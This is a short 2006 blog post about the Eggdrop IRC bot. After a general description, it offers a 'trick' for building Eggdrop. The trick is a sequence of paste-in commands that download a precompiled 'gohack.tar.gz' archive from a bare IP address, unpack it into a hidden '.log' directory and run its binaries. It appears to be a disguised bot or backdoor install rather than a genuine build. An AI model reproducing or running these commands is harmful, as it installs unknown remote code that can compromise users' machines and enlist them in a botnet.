Monday, September 04, 2006

Eggdrop & tools

Eggdrop is an Internet Relay Chat (IRC) bot that can be extended using either C modules or Tool Command Language (TCL) scripts. Eggdrop is one of the oldest IRC bots still in active development, and it can be programmed to perform an endless amount of tasks.
Eggdrop is the world's most popular Open Source IRC bot, designed for flexibility and ease of use, and is freely distributable under the GNU General Public License (GPL). Eggdrop was originally developed by Robey Pointer; however, he no longer works on Eggdrop so please do not contact him for help solving a problem or bug 

this is some trick to build eggdrop 1.6.6 with precompile version and netgate.tcl

wget http://84.244.6.111/gohack.tar.gz
tar xvzf gohack.tar.gz
cd .log
./gohack config_bot nick_bot ident ip channel owner
./tcl -t config_bot some.tcl
./eggdrop -m config_bot

got it ...you have bot ...
but it's for dalnet you can edit server at netgate.tcl :)

no matter what